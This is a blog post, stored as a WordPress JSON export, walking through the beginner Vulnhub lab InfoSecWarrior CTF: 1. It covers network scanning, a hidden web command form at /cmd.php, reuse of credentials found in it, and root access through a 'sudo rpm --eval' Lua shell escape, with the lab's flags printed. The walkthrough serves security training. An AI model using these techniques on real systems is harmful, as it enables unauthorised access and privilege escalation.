{"id":25972,"date":"2020-04-08T15:26:35","date_gmt":"2020-04-08T09:56:35","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=25972"},"modified":"2020-04-09T18:13:56","modified_gmt":"2020-04-09T12:43:56","slug":"infosecwarrior-ctf-2020-01-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-2020-01-walkthrough\/","title":{"rendered":"InfoSecWarrior CTF: 1 Walkthrough"},"content":{"rendered":"

Here’s a new InfoSecWarrior CTF: 1 Walkthrough<\/strong> for Vulnhub<\/strong> machines. InfoSecWarrior CTF 2020: 01 is the first challenge of Infosec Warrior CTF 2020<\/strong><\/a>. This challenge was created by CyberKnight00 and MAALP1225. You can download this CTF here<\/a>. It states that the level is Easy, and that is true. Either way, you explore a little if this is unfamiliar, and that’s how you learn. This box is designed for beginners and wannabe hackers to polish their pentesting skills. So, here we go.<\/p>\n

\"InfoSecWarrior<\/h2>\n

Penetration Testing Methodologies<\/h2>\n

Network Scan<\/h4>\n
    \n
  • \u00a0Netdiscover<\/li>\n
  • \u00a0Nmap Enumeration<\/li>\n<\/ul>\n

    Enumeration<\/h4>\n
      \n
    • \u00a0Nikto<\/li>\n
    • Password guessing<\/li>\n
    • Web enumeration<\/li>\n<\/ul>\n

      Privilege Escalation<\/h4>\n
        \n
      • Capture the Flag.<\/li>\n
      • password<\/li>\n
      • Sudo -l<\/li>\n<\/ul>\n

        Network Scanning<\/h3>\n

        Without wasting much time, let’s start by obtaining the IP address of the box. I used netdiscover<\/strong> and got the IP 192.168.2.13<\/strong>.<\/p>\n

        #netdiscover -i vboxnet0                                                                                                                                                                                                                                                                                                                  \r\n 2 Captured ARP Req\/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                \r\n _____________________________________________________________________________\r\n   IP            At MAC Address     Count     Len  MAC Vendor \/ Hostname      \r\n -----------------------------------------------------------------------------\r\n 192.168.2.2     08:00:27:b8:05:a6      1      42  PCS Systemtechnik GmbH                                                                                                                       \r\n 192.168.2.13    08:00:27:7a:cd:67      1      60  PCS Systemtechnik GmbH<\/pre>\n

        Let’s proceed with the network scan using\u00a0Nmap<\/strong> aggressive scan as shown below.<\/p>\n

        #nmap -p- -A -sS -sC 192.168.2.13\r\n\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-04-08 12:11 IST\r\nNmap scan report for 192.168.2.13\r\nHost is up (0.00074s latency).\r\nNot shown: 65533 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n22\/tcp open  ssh     OpenSSH 5.3 (protocol 2.0)\r\n| ssh-hostkey: \r\n|   1024 2f:b3:a5:cd:e5:14:33:a1:82:3b:dd:5a:5e:d7:59:36 (DSA)\r\n|_  2048 2d:b4:15:28:36:d8:b5:4e:18:81:8e:af:3e:e4:de:c1 (RSA)\r\n80\/tcp open  http    Apache httpd 2.2.15 ((CentOS))\r\n| http-methods: \r\n|_  Potentially risky methods: TRACE\r\n|_http-server-header: Apache\/2.2.15 (CentOS)\r\n|_http-title: Apache HTTP Server Test Page powered by CentOS\r\nMAC Address: 08:00:27:7A:CD:67 (Oracle VirtualBox virtual NIC)\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nRunning: Linux 2.6.X|3.X\r\nOS CPE: cpe:\/o:linux:linux_kernel:2.6 cpe:\/o:linux:linux_kernel:3\r\nOS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13\r\nNetwork Distance: 1 hop\r\nNmap did: 1 IP address (1 host up) scanned in 164.64 seconds<\/pre>\n

        Enumeration<\/h3>\n

        The first thing we notice is port 80 is open and we see the Apache Test page on the web.<\/p>\n

        \"InfoSecWarrior<\/p>\n

        On further enumeration, I came across \/note.txt\u00a0<\/strong>as shown below, but there is nothing important to see here.<\/p>\n

        \"InfoSecWarrior<\/p>\n

        \/sitemap.xml\u00a0<\/strong>is indexed, which leads to a new page, \/index.htnl<\/strong>.<\/p>\n

        \"sitemap\"<\/p>\n

        The page consists of a GIF, so I viewed the page source.<\/p>\n

        \"meme\"<\/p>\n

        <h1>Keep Calm And HACK<\/h1>\r\n<img src=\"hacker.gif\" alt=\"Hacker\" height=\"640\" width=\"1280\"> \r\n<img hidden=\"True\" src=\"minnions.gif\" alt=\"Hackor\" height=\"640\" width=\"1280\">   [here there is a GIF that is hidden]\r\n<form action = \"\/cmd.php\" hidden=\"True\" method = \"GET\">  [here there is a form that is hidden]\r\n command\r\n     <input type = \"text\" name = \"AI\" value = \"\" maxlength = \"100\" \/>\r\n <br \/>\r\n <input type = \"submit\" value =\"Submit\" \/>\r\n<\/form>\r\n<\/pre>\n

        So I changed the hidden part of the code and sent an “id” command to \/cmd.php\u00a0<\/strong><\/p>\n

        \"inspect\"<\/p>\n

        It worked, but not as I expected: it gave an error and a clue to use another HTTP method. So I changed the form method from\u00a0GET\u00a0<\/strong>to\u00a0POST<\/strong>.<\/p>\n

        \"id\"<\/p>\n

        Yes, I found you.\u00a0 Now I tried opening\u00a0\/etc\/passwd\u00a0<\/strong><\/p>\n

        \"InfoSecWarrior<\/p>\n

        On further enumeration, I opened \/cmd.php\u00a0<\/strong>and found the credentials of the user:\u00a0isw0:123456789blabla<\/strong><\/p>\n

         #ssh isw0@192.168.2.13\r\n\r\nThe authenticity of host '192.168.2.13 (192.168.2.13)' can't be established.\r\nRSA key fingerprint is SHA256:rNHlcfJ22Jb4j6wQvLvKK\/+tc9khM8tM3yq9yDiz6dQ.\r\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\r\nWarning: Permanently added '192.168.2.13' (RSA) to the list of known hosts.\r\nisw0@192.168.2.13's password: \r\nLast login: Thu Feb 13 18:41:34 2020 from 192.168.1.56\r\n[isw0@InfosecWarrior ~]$ whoami\r\nisw0\r\n[isw0@InfosecWarrior html]$ id\r\nuid=500(isw0) gid=500(isw0) groups=500(isw0) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n[isw0@InfosecWarrior html]$ hostname\r\nInfosecWarrior\r\n[isw0@InfosecWarrior ~]$ cat isw0_user \r\ne4408105ca9c2a5c2714a818c475d06e\r\n[isw0@InfosecWarrior ~]$ \r\n<\/pre>\n

        Got the user flag; now going for the root flag.<\/p>\n

        [isw0@InfosecWarrior ~]$ sudo -l\r\nMatching Defaults entries for isw0 on this host:\r\n    !visiblepw, always_set_home, env_reset, env_keep=\"COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS\", env_keep+=\"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\",\r\n    env_keep+=\"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\", env_keep+=\"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\", env_keep+=\"LC_TIME LC_ALL LANGUAGE LINGUAS\r\n    _XKB_CHARSET XAUTHORITY\", secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\r\n\r\nUser isw0 may run the following commands on this host:\r\n    (!root) NOPASSWD: \/bin\/bash\r\n    (root) \/bin\/ping, (root) \/bin\/ping6, (root) \/bin\/rpm, (root) \/bin\/ls, (root) \/bin\/mktemp\r\n[isw0@InfosecWarrior ~]$ sudo bash\r\n[sudo] password for isw0: \r\nSorry, user isw0 is not allowed to execute '\/bin\/bash' as root on InfosecWarrior.\r\n[isw0@InfosecWarrior ~]$ sudo rpm --eval '%{lua:os.execute(\"\/bin\/sh\")}'\r\n[sudo] password for isw0: \r\nsh-4.1# id\r\nuid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:rpm_script_t:s0-s0:c0.c1023\r\nsh-4.1# hostname\r\nInfosecWarrior\r\nsh-4.1# cd\r\nsh-4.1# ls\r\nanaconda-ks.cfg  Armour.sh  flag.txt  install.log  install.log.syslog\r\nsh-4.1# cat flag.txt \r\nfc9c6eb6265921315e7c70aebd22af7e\r\nsh-4.1# exit\r\nexit<\/pre>\n

         <\/p>\n

        Eureka !!!!!! GOT THE FLAG<\/p>\n

         <\/p>\n